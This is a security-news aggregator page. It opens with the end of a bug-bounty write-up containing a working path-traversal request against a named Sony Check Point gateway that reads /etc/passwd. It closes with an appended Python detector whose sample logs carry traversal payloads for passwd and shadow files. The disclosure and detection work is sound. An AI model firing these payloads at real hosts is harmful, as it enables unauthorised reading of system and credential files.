Host: x15.sonydadc.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Length: 39
Accept-Encoding: gzip, deflate

aCSHELL/../../../../../../../etc/passwd

The server response reveals the sensitive file /etc/passwd:

HTTP/1.0 200 OK
admin:x:0:0::/home/admin:/bin/bash
monitor:x:102:100:Monitor:/home/monitor:/etc/cli.sh

Remediation

To mitigate this issue, affected servers should ensure that the latest security patches from Check Point are applied and access controls are updated to prevent unauthorized access to sensitive resources.

Conclusion

This vulnerability demonstrates how even trusted systems, like Sony’s Quantum Gateway, can expose sensitive data if not properly secured. The Sony HackerOne program has been an exciting platform to collaborate with, and finding this vulnerability earned me some cool swag as a reward for responsible disclosure!

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/

If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.
For enrolling in my cybersecurity and Bug Bounty course, WhatsApp +91 82709 13635.

Connect with me:
Twitter: https://twitter.com/karthithehacker
Instagram: https://www.instagram.com/karthithehacker/
LinkedIn: https://www.linkedin.com/in/karthikeyan--v/
Website: https://www.karthithehacker.com/
Github: https://github.com/karthi-the-hacker/
npmjs: https://www.npmjs.com/~karthithehacker
Youtube: https://www.youtube.com/@karthi_the_hacker

Thank you
Karthikeyan.V

A Story About How I Found CVE-2024-24919 in Sony’s HackerOne Program (and Ended Up Getting Swag) was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Active exploits aimed at firewalls mark yet another string of attacks targeting devices with high-value initial access, researchers said.

by Cybersecurity Dive

New malware variants hit the threat landscape all the time. Malware authors continuously modify code in order to avoid detection, and develop variants that can exploit security vulnerabilities before they’re patched. Innovations in malware are also developed to exploit new technologies and platforms, and to improve the capabilities of existing malware with enhanced functionality, making variants that are increasingly sophisticated. Today’s malware is often designed on a modular architecture, which means developers can easily switch, add, or modify components without having to rework the entire architecture. This means that new variants (with more advanced or more targeted capabilities) can emerge very quickly. And the availability of automated tools for creating and deploying malware is accelerating the generation of new threats, creating a landscape that is increasingly difficult for cybersecurity firms to monitor. Here are three new malware variants causing disruption for victims right now.

1. Cuckoo Spear

Researchers at Cybereason have uncovered Cuckoo Spear, a threat actor linked with the APT10 group. Stealthy operations appear to have been underway for up to three years, with an advanced persistent threat (APT) that conducts cyber espionage. Cuckoo Spear is a new collective term for LODEINFO and NOOPDOOR, which have been found to be connected. Cuckoo Spear leverages both of these malware variants for persistent network infiltration and data exfiltration. Cybereason’s team has explored the sophisticated capabilities of Cuckoo Spear, which include decryption mechanisms, modular architecture, and DGA-based C2 communication.

2. Flame Stealer

Flame Stealer, first uncovered in April 2024, is a comprehensive data thief with the capabilities to steal a range of sensitive data. A tweet by ThreatMon notes that it can capture login information, passwords, credit card details, and PayPal information, and it claims to be undetectable by antivirus tools. It then instantly transmits stolen data to a specific Telegram channel or webhook. Once it has infected a system, it remains active via automatic re-injection. Importantly, it’s been found to target a number of popular digital platforms, including Spotify, Instagram, TikTok, and Discord, so it poses a significant risk for a high volume of users. It’s also capable of stealing digital wallet data and capturing two-factor authentication codes when a user enters them, further compromising users’ security online.

3. MacOS malware disguised as an Unarchiver app

Unarchiver apps are used all the time, and digital users trust them as a means to extract archived files. But this trust can be abused by threat actors who plant malware into unarchiver downloads. Security analysts at Hunt.io recently discovered a phishing site disguised as a popular unarchiver app, with only a slightly modified domain name and download button to set the fake unarchiver site apart from the real one. A grabber zip file was found to contain 10 shell scripts with the purpose of stealing user data. The first script sets up a directory in the user’s library folder, collects IP information, and then executes the other data-grabbing scripts, before transmitting compressed, stolen data to a remote server.

Users must be vigilant and implement security updates

As we continue to see new malware threats emerge on the threat landscape globally, it’s critical that all digital users have access to actionable cybersecurity education. They need to know what to look for so they can stay vigilant. At the same time, software updates should be installed routinely to avoid leaving vulnerabilities unpatched.

P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

The report by IANS Research and Artico Search shows security priorities are clashing with economic realities.  

by Cybersecurity Dive

Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.

by Cisco Talos Blog

It takes more than technical knowledge to write about cybersecurity in a way people want to read. It takes creativity, discipline, and other key skills.

by Dark Reading

With the country expected to hold its general elections soon, the bill is touted to provide safeguards against digitally manipulated content.

by ZDNET Security

2024-09-10 00:00:00

Node API Security

Briefly exploring core concepts around Node API security with regards to GraphQL and REST API design with code examples specific to Node.js application servers.

by Node.js Security

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-43461.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Microsoft SharePoint. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2024-43466.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38249.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft SharePoint. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38018.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Photoshop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-43760.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe After Effects. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39381.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Premiere Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39384.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Media Encoder. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39377.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe After Effects. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-39382.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Premiere Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-39385.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Audition. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39378.

by Zero Day Initiative Advisories

Windows heap overflow (@esj4y), Linux TCP UAF (@v4bel), Goffloader (@BouncyHat), Intune lat-movement (@h4wkst3r), browser attack detection (@mega_spl0it), and more!

by Bad Sector Labs

A novel side-channel attack has been found to leverage radio signals emanated by a device's random access memory (RAM) as a data exfiltration mechanism, posing a threat to air-gapped networks. The technique has been codenamed RAMBO (short for "Radiation of Air-gapped Memory Bus for Offense") by Dr. Mordechai Guri, the head of the Offensive Cyber Research Lab in the Department of Software

by The Hacker News

Explore Unit 42's review of North Korean APT groups and their impact, detailing the top 10 malware and tools we've seen from these threat actors. The post Threat Assessment: North Korean Threat Groups appeared first on Unit 42.

by Palo Alto Networks - Unit42

CISA has added CVE-2024-40766 to its known exploited vulnerabilities catalog.

by ITPro Today

Workers now supports more NPM packages and Node.js APIs using an overhauled hybrid compatibility layer.

by Cloudflare

In this short data-driven talk, learn how to not only improve your security awareness / culture program but grow your career and improve your happiness at work. The post Convene Chats – Top Action Items from the SANS 2024 Security Awareness Report: Its All About You appeared first on National Cybersecurity Alliance.

by National Cybersecurity Alliance

Researchers at Malwarebytes warn of a surge in election-themed scams ahead of November’s presidential election in the US. These attacks can be expected to increase as the election grows closer.

by KnowBe4

Threat actors are opting for malicious links over attachments in email-based attacks because it gives them a critical advantage that many solutions can’t address.

by KnowBe4

CISA has added CVE-2024-40766 to its Known Exploited Vulnerabilities catalog.

by Dark Reading

Zimperium’s Zero-Day defense against a sophisticated Android malware campaign involving SpyAgent, a spyware strain designed to steal cryptocurrency credentials. The post Unmasking SpyAgent: Zimperium’s Zero-Day Defense Against Cryptocurrency Theft appeared first on Zimperium.

by Zimperium

The attack signals a new shift in RansomHub's arsenal of tools.

by ThreatDown

Though the company reports that data was exfiltrated in the breach, it has remained tight-lipped about what kind of data was exposed.

by Dark Reading

The proliferation of cybersecurity tools has created an illusion of security. Organizations often believe that by deploying a firewall, antivirus software, intrusion detection systems, identity threat detection and response, and other tools, they are adequately protected. However, this approach not only fails to address the fundamental issue of the attack surface but also introduces dangerous

by The Hacker News

The Colombian insurance sector is the target of a threat actor tracked as Blind Eagle with the end goal of delivering a customized version of a known commodity remote access trojan (RAT) referred to as Quasar RAT since June 2024. "Attacks have originated with phishing emails impersonating the Colombian tax authority," Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis

by The Hacker News

The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia. "This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a

by The Hacker News

GenAI has become a table-stakes tool for employees, due to the productivity gains and innovative capabilities it offers. Developers use it to write code, finance teams use it to analyze reports, and sales teams create customer emails and assets. Yet these capabilities are exactly the ones that introduce serious security risks. Register for our upcoming webinar to learn how to prevent GenAI data

by The Hacker News

Explore industry moves and significant changes in the industry for the week of September 9, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

This week on the Lock and Code podcast, we speak with Eva Galperin about the arrest of Telegram's CEO and how it impacts security and privacy.

by Malwarebytes Labs

Designed to be more than a one-time assessment, Wing Security’s SaaS Pulse provides organizations with actionable insights and continuous oversight into their SaaS security posture, and it’s free! Introducing SaaS Pulse: Free Continuous SaaS Risk Management. Just like waiting for a medical issue to become critical before seeing a doctor, organizations can’t afford to overlook the constantly

by The Hacker News

Progress Software has released security updates for a maximum-severity flaw in LoadMaster and Multi-Tenant (MT) hypervisor that could result in the execution of arbitrary operating system commands. Tracked as CVE-2024-7591 (CVSS score: 10.0), the vulnerability has been described as an improper input validation bug that results in OS command injection. "It is possible for unauthenticated, remote

by The Hacker News

When Office 2024 is released next month, ActiveX controls will be off by default in client apps like Word, Excel, and PowerPoint.

by ThreatDown

Android device users in South Korea have emerged as a target of a new mobile malware campaign that delivers a new type of threat dubbed SpyAgent. The malware "targets mnemonic keys by scanning for images on your device that might contain them," McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K. The campaign makes use

by The Hacker News

A flaw in the design of WhatsApp's "View Once" privacy feature lets anyone save pictures and videos that should be ephemeral. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Capital One Launches Public Bug Bounty Program with HackerOne

HackerOne, Mon, 09/09/2024 - 10:42

What's New?

We at Capital One strongly believe in the importance of security, and part of our mission is to protect our customers and their data. As part of this commitment, we launched our private bug bounty program in 2019, inviting hackers from all over the world to find and report vulnerabilities on any of our external assets. Over the past five years, we’ve expanded, collaborated, and established ourselves as a good partner within the bug bounty community. During this time, we’ve worked with HackerOne to host multiple Live Hacking Events, focusing on securing our most critical applications. We've also hosted focused testing engagements to utilize the bright minds in the bug bounty community to help secure Capital One, but we don’t want to stop there. This year, we plan to take it a step further by launching Capital One’s new public bug bounty program. We invite everyone to take this step with us and join us in continuing to build and preserve a secure environment for our customers.

What’s in Scope?

The scope of this program will put a major focus on Capital One’s core external-facing applications. This enhanced focus will help to bolster security on our heavily used applications and ultimately provide more security for our end users. The in-scope domains include:

*.capitalone.com
*.capitaloneshopping.com
*.capitalonegslbex.com
*.capitalone.ca
ENO Browser Extension
Capital One Shopping Browser Extension
Mobile Apps for each of the above applications, if applicable

Attack scenarios that rely on physical testing, social engineering, phishing, and denial-of-service attacks will be out of scope, as will third-party domains and assets.

How Capital One Handles Vulnerabilities and Disclosures

Capital One is committed to investing in the security of our customers’ information. Our Bug Bounty team is a group of security professionals who responsibly handle all of the potential security vulnerabilities identified by hackers worldwide. Our team is steadfast in its efforts to maintain the security of our customers, actively receiving and responding to any potential security vulnerability reports we might receive through initial triage, impact assessment, and remediation to proactively safeguard our customers. As a hacker and future reporter for our program, you can expect your report to undergo an initial triage assessment and validation via our partner, HackerOne. After this, Capital One's Bug Bounty team will perform a secondary validation where we will test and assess the impact of your submitted vulnerability and work with our internal teams to develop and implement a fix. You can expect to be kept in the loop, from validation to remediation, with transparent communication from our team being paramount. We look forward to taking this leap, as we strive to protect our customers, and hope that you choose to take the leap with us. Catch you in the logs!

by HackerOne

Endpoint security has been around for decades, but changes in device use and the quick evolution of new attacks have triggered the development of new security techniques.

by Dark Reading

For the latest discoveries in cyber research for the week of 9th September, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The German air traffic control agency, Deutsche Flugsicherung, has confirmed a cyberattack that impacted its administrative IT infrastructure. The extent of data accessed is still under investigation, and flight operations remained unaffected. […] The post 9th September – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Supercharge Your Writing With AI, Do It Now mantra, URL validation bypass cheat sheet, and more...

by Hive Five

Around two years ago, memN0ps took the initiative to create one of the first publicly available rootkit proof of concepts (PoCs) in Rust as an experimental project, while learning a new programming language. It still lacks many features, which are relatively easy to add once the concept is understood, but it was developed within a month, in a part-time capacity.

by SpiderLabs Blog

Summer is over and it’s back-to-school time, so get yourself registered now for September’s batch of timely, information-packed Barracuda webinars.

by Barracuda

With patches out for three years, attackers have set their sights on a pair of vulnerabilities affecting DrayTek VigorConnect.

Background

In November 2021, the Cybersecurity and Infrastructure Security Agency (CISA) launched its Known Exploited Vulnerabilities (KEV) Catalog, an effort to focus on vulnerabilities known to have been exploited and provide defenders with an actionable list of vulnerabilities to prioritize their remediation efforts. On September 3, CISA added three new vulnerabilities to the KEV, two of which were discovered and responsibly disclosed to DrayTek by security researchers from Tenable Research.

CVE             Description                                                                                CVSSv3  VPR
CVE-2021-20123  DrayTek VigorConnect Unauthenticated Local File Inclusion / Path Traversal Vulnerability  7.5     7.7
CVE-2021-20124  DrayTek VigorConnect Unauthenticated Local File Inclusion / Path Traversal Vulnerability  7.5     7.7

*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on September 9 and reflects VPR at that time.

Analysis

CVE-2021-20123 and CVE-2021-20124 are local file inclusion vulnerabilities affecting the DownloadFileServlet and WebServlet endpoints of DrayTek VigorConnect, network management software used to manage and configure DrayTek network devices. Using a specially crafted request containing path traversal sequences, an unauthenticated attacker can download arbitrary files from the underlying operating system with root privileges. These vulnerabilities were discovered by researchers at Tenable and disclosed to DrayTek, which released a patch in October 2021.

Despite patches having been available for three years, attackers have been observed exploiting these flaws on unpatched systems, earning them a spot on the CISA KEV list. As we’ve examined in multiple reports, including our 2020, 2021 and 2022 Threat Landscape Reports, known and exploitable vulnerabilities continue to be targeted by threat actors. Simply stated, these vulnerabilities continue to be targeted because exploit code for them is well known and actors continue to find unpatched, vulnerable targets to attack.

Despite the hype, few targets appear to be publicly available

Using platforms such as Shodan.io and a basic query for “draytek”, over 700,000 assets are returned. Looking closer, nearly 610,000 of these devices have port 1723 open, the port used for Point-to-Point Tunneling Protocol (PPTP) on DrayTek Vigor routers. Such a vast number of internet-facing DrayTek assets makes large-scale attacks tempting to threat actors.

Source: Shodan.io

Yet if we look at the number of internet-facing assets on Shodan.io specifically for DrayTek VigorConnect, identified by device title, certificate elements or the hash value of its favicon, only a handful of assets are exposed.

Source: Shodan.io

Looking at other platforms such as FOFA, using the VigorConnect favicon hash value as an example, the number returned is larger than Shodan.io’s, at 44 results (37 unique IPs), but it is still relatively small.

Source: FOFA

Threat actors might target DrayTek VigorConnect, despite fewer than 50 internet-facing assets, because exploiting a small number of systems is easy and can be automated. Despite the size of its attack surface, VigorConnect could provide access to sensitive network configurations, and its reduced complexity might allow attackers to navigate and persist undetected. This makes it a strategic target for establishing access to larger networks while staying under the radar.

Attacks are on the rise

CISA has not provided evidence on the source or level of attacks observed in the wild, but data from Shadowserver, which provides statistics based on server-side attacks seen by its honeypot sensor network, offers some limited insight. Looking at activity for the vendor DrayTek from September 1, 2024 to September 9, the date this blog was published, we can see an uptick in connections to Shadowserver sensors for CVE-2021-20123 and CVE-2021-20124. While the level of activity is not huge, it covers only Shadowserver sensors, a small and specific subset of exposed devices, and it is consistent with CISA’s warning of observed active exploitation.

Source: Shadowserver

Proof of concept

As part of our responsible disclosure policy, Tenable regularly releases proof-of-concept (PoC) code with our Tenable Research Advisories (TRAs). In a coordinated release on October 8, 2021, Tenable released TRA-2021-42, which included PoCs for both CVE-2021-20123 and CVE-2021-20124.

Solution

DrayTek released VigorConnect version 1.6.1 on October 7, 2021, to address all of the vulnerabilities reported by Tenable Research.

Identifying affected systems

A list of Tenable plugins for these vulnerabilities can be found on the individual CVE pages for CVE-2021-20123 and CVE-2021-20124 as they’re released. These links display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.

Get more information

Tenable Research Advisory TRA-2021-42
DrayTek VigorConnect version 1.6.1 Security Advisory
CISA September 3, 2024 KEV Alert
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable
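The Tenable write-up above describes CVE-2021-20123 and CVE-2021-20124 as unauthenticated path-traversal reads through the DownloadFileServlet and WebServlet endpoints, and notes that Shadowserver honeypots are seeing attempts. The following is an added example, not Tenable's or DrayTek's code, of the detection a defender would run over their own web-server access logs to spot such attempts. It assumes a common/combined log format; the servlet names come from the advisory, but the mount path and query parameter names are not given on the page, so matching is done by path segment and the whole request target, and the sample log lines are constructed for illustration.

```python
"""Added example (not Tenable's or DrayTek's code): scan web-server access-log
lines for path-traversal requests aimed at the two VigorConnect endpoints
named in the advisory. The log lines below are constructed for illustration."""
import re
from urllib.parse import unquote, urlsplit

# Servlet names from the Tenable write-up. The exact mount path and query
# parameter names are not given on the page, so matching is by path segment.
TARGET_SERVLETS = {"DownloadFileServlet", "WebServlet"}

# Apache/NGINX common-log style: ip - - [ts] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (addresses are from the RFC 5737 documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Sep/2024:10:01:02 +0000] "GET /DownloadFileServlet?file=../../../../etc/passwd HTTP/1.1" 200 1842
203.0.113.7 - - [03/Sep/2024:10:01:05 +0000] "GET /WebServlet?path=..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 200 911
203.0.113.7 - - [03/Sep/2024:10:01:09 +0000] "GET /DownloadFileServlet?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1842
198.51.100.4 - - [03/Sep/2024:10:02:00 +0000] "GET /DownloadFileServlet?file=reports/2024-09.pdf HTTP/1.1" 200 52110
198.51.100.4 - - [03/Sep/2024:10:02:30 +0000] "GET /index.html HTTP/1.1" 200 3201
192.0.2.9 - - [03/Sep/2024:10:03:00 +0000] "GET /images/..\\..\\..\\etc\\passwd HTTP/1.1" 404 0
"""


def fully_decode(s: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of percent-encoding so that %2e%2e%2f and
    the double-encoded %252e%252e%252f both normalise to '../'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target: str):
    """Return (traversal, servlet_hit, decoded) for one request target.
    Backslashes are folded to '/' so Windows-style '..\\' is caught too."""
    decoded = fully_decode(target).replace("\\", "/")
    traversal = "../" in decoded
    segments = urlsplit(decoded).path.split("/")
    servlet_hit = any(seg in TARGET_SERVLETS for seg in segments)
    return traversal, servlet_hit, decoded


def scan(log_text: str):
    """Return one finding per traversal request, in log order. `servlet` marks
    hits on the VigorConnect endpoints. A 200 on a host older than 1.6.1 is a
    likely file read, but the status code alone does not prove it succeeded."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        traversal, servlet_hit, decoded = classify(m["target"])
        if traversal:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "target": m["target"], "decoded": decoded, "servlet": servlet_hit,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = "VIGORCONNECT" if f["servlet"] else "generic"
        print(f"[{tag}] {f['ip']} {f['status']} {f['decoded']}")
```

Run against the constructed log, the scanner flags the three servlet requests from 203.0.113.7 (plain, single-encoded and double-encoded traversal) and separately reports the generic traversal probe against /images/, while the legitimate report download and index fetch pass. Decoding several layers before matching matters because a rule that only looks for a literal `../` misses the encoded variants that automated scanners send first.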